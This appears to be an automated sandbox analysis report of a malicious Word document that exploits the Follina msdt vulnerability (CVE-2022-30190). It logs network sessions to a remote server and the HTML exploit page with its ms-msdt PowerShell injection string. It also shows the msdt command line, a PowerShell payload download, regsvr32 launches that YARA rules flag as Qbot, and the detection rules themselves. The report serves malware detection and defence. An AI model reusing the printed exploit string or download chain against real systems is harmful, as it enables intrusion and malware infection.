                                                                                                                                                                      Jun 7, 2022 18:45:12.061198950 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061220884 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061220884 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.061242104 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061259031 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.061268091 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.061290979 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:12.062242985 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.062278032 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.062300920 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:12.062329054 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      • 185.234.247.119
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49752 | 185.234.247.119 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
Jun 7, 2022 18:44:03.661154032 CEST | 847 | OUT | OPTIONS / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                      X-MSGETWEBURL: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      Host: 185.234.247.119
Jun 7, 2022 18:44:03.689259052 CEST | 847 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:03 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 150
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
Jun 7, 2022 18:44:03.797730923 CEST | 848 | OUT | HEAD /123.RES HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      Host: 185.234.247.119
Jun 7, 2022 18:44:03.825808048 CEST | 848 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:03 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Jun 7, 2022 18:44:06.937927008 CEST | 1205 | OUT | OPTIONS / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                      X-MSGETWEBURL: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:07.195615053 CEST | 1205 | OUT | OPTIONS / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                      X-MSGETWEBURL: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:07.224698067 CEST | 1205 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:07 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 150
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                      Jun 7, 2022 18:44:08.227951050 CEST | 1215 | OUT | OPTIONS / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                      X-MSGETWEBURL: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.256129026 CEST | 1215 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:08 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 150
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                      Jun 7, 2022 18:44:08.296071053 CEST | 1215 | OUT | HEAD /123.RES HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.324341059 CEST | 1216 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:08 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes


                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                                      1 | 192.168.2.4 | 49758 | 185.234.247.119 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                      Jun 7, 2022 18:44:07.498353004 CEST | 1206 | OUT | GET /123.RES HTTP/1.1
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 18:44:07.525994062 CEST | 1208 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:07 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus massa. Pellente
                                                                                                                                                                      Jun 7, 2022 18:44:07.526021004 CEST | 1209 | IN
                                                                                                                                                                      Data Ascii: sque quis pretium massa. Vivamus facilisis ultricies massa ac commodo. Nam nec congue magna. Nullam laoreet justo ut vehicula lobortis.Aliquam rutrum orci tortor, non porta odio feugiat eu. Vivamus nulla mauris, eleifend eu egestas sceleri
                                                                                                                                                                      Jun 7, 2022 18:44:07.526053905 CEST | 1210 | IN
                                                                                                                                                                      Data Ascii: erdum, nisl eu laoreet tempus, augue nisl volutpat odio, dictum aliquam massa orci sit amet magna.Duis pulvinar vitae neque non placerat. Nullam at dui diam. In hac habitasse platea dictumst. Sed quis mattis libero. Nullam sit amet condime
                                                                                                                                                                      Jun 7, 2022 18:44:07.526104927 CEST | 1212 | IN
                                                                                                                                                                      Data Ascii: amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus.Morbi convallis fringilla
                                                                                                                                                                      Jun 7, 2022 18:44:07.526155949 CEST | 1213 | IN
                                                                                                                                                                      Data Ascii: , justo ac porta facilisis, mi sapien efficitur ipsum, sit fusce.</p><script> location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invo
                                                                                                                                                                      Jun 7, 2022 18:44:07.803332090 CEST | 1213 | OUT | HEAD /123.RES HTTP/1.1
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 18:44:07.831824064 CEST | 1214 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:07 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Jun 7, 2022 18:44:08.025104046 CEST | 1214 | OUT | HEAD /123.RES HTTP/1.1
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 18:44:08.052786112 CEST | 1214 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:08 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Jun 7, 2022 18:44:08.363728046 CEST  1216  OUT  GET /123.RES HTTP/1.1
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      If-None-Match: "6299dd5d-1861"
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 18:44:08.391499996 CEST  1216  IN  HTTP/1.1 304 Not Modified
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:08 GMT
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Jun 7, 2022 18:44:08.493047953 CEST  1217  OUT  HEAD /123.RES HTTP/1.1
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 18:44:08.520741940 CEST  1217  IN  HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:08 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Jun 7, 2022 18:44:09.212635040 CEST  1224  OUT  HEAD /123.RES HTTP/1.1
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 18:44:09.240037918 CEST  1322  IN  HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:09 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Jun 7, 2022 18:44:14.023246050 CEST  1416  OUT  HEAD /123.RES HTTP/1.1
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 18:44:14.050962925 CEST  1417  IN  HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:14 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes


                                                                                                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                                                                                                                      2  192.168.2.4  49781  185.234.247.119  80  C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                                                                                                                      Jun 7, 2022 18:45:11.398526907 CEST  4705  OUT  GET /1676044147.dat HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 18:45:11.563088894 CEST  4707  IN  HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:45:11 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 1437696
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Expires: 0
                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                      Content-Disposition: attachment;


                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:18:43:54
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                      Imagebase:0x980000
                                                                                                                                                                      File size:1937688 bytes
                                                                                                                                                                      MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

Target ID: 1
Start time: 18:44:01
Start date: 07/06/2022
Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Wow64 process (32bit): true
Commandline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Imagebase: 0xcd0000
File size: 466688 bytes
MD5 hash: EA19F4A0D18162BE3A0C8DAD249ADE8C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 2
Start time: 18:44:02
Start date: 07/06/2022
Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Wow64 process (32bit): true
Commandline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Imagebase: 0xcd0000
File size: 466688 bytes
MD5 hash: EA19F4A0D18162BE3A0C8DAD249ADE8C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 7
Start time: 18:44:11
Start date: 07/06/2022
Path: C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'<base64 payload removed>'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Imagebase: 0x390000
File size: 1508352 bytes
MD5 hash: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.544430061.00000000029A0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.544117188.0000000002910000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.544599667.00000000029A8000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.545886890.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
Reputation: moderate

Target ID: 20
Start time: 18:44:42
Start date: 07/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jsmb0bcn\jsmb0bcn.cmdline
Imagebase: 0x1090000
File size: 2170976 bytes
MD5 hash: 350C52F71BDED7B99668585C15D70EEA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: moderate

Target ID: 21
Start time: 18:44:46
Start date: 07/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6719.tmp" "c:\Users\user\AppData\Local\Temp\jsmb0bcn\CSC77C6618222CF46A59B8ECBD8FB1D6F27.TMP"
Imagebase: 0xf80000
File size: 43176 bytes
MD5 hash: C09985AE74F0882F208D75DE27770DFA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 22
Start time: 18:44:49
Start date: 07/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrcfnpcx\hrcfnpcx.cmdline
Imagebase: 0x1090000
File size: 2170976 bytes
MD5 hash: 350C52F71BDED7B99668585C15D70EEA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: moderate

Target ID: 23
Start time: 18:44:51
Start date: 07/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AFF.tmp" "c:\Users\user\AppData\Local\Temp\hrcfnpcx\CSC21799C95C9C74436A487E343E485758E.TMP"
Imagebase: 0xf80000
File size: 43176 bytes
MD5 hash: C09985AE74F0882F208D75DE27770DFA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 26
Start time: 18:45:11
Start date: 07/06/2022
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
Imagebase: 0xa90000
File size: 20992 bytes
MD5 hash: 426E7499F6A7346F0410DEAD0805586B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001A.00000002.494919958.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001A.00000002.494919958.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001A.00000002.494431106.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: high

Target ID: 27
Start time: 18:45:12
Start date: 07/06/2022
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
Imagebase: 0xa90000
File size: 20992 bytes
MD5 hash: 426E7499F6A7346F0410DEAD0805586B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.496074932.0000000005340000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001B.00000002.495963327.0000000005310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.495963327.0000000005310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: high

Target ID: 28
Start time: 18:45:13
Start date: 07/06/2022
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
Imagebase: 0xa90000
File size: 20992 bytes
MD5 hash: 426E7499F6A7346F0410DEAD0805586B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001C.00000002.500357016.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001C.00000002.500357016.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001C.00000002.499646382.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

Target ID: 31
Start time: 18:45:32
Start date: 07/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0x1gvsr0\0x1gvsr0.cmdline
Imagebase: 0x1090000
File size: 2170976 bytes
MD5 hash: 350C52F71BDED7B99668585C15D70EEA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

                                                                                                                                                                      Target ID:32
                                                                                                                                                                      Start time:18:45:46
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES51A8.tmp" "c:\Users\user\AppData\Local\Temp\0x1gvsr0\CSCC2AC50C55CDA45EB81AFC36471CF588E.TMP"
                                                                                                                                                                      Imagebase:0xf80000
                                                                                                                                                                      File size:43176 bytes
                                                                                                                                                                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:33
                                                                                                                                                                      Start time:18:45:48
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Imagebase:0x10a0000
                                                                                                                                                                      File size:3611360 bytes
                                                                                                                                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
